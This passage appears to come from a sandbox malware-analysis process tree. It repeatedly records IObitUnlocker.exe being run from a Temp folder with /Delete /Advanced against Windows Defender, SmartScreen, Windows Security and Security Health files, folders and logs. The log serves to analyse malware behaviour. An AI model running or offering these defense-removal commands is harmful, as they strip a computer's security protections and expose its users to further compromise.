Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:9612
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:9040
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9300
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:9616
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:10256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:10508
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:10804
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:11116
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:10132
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 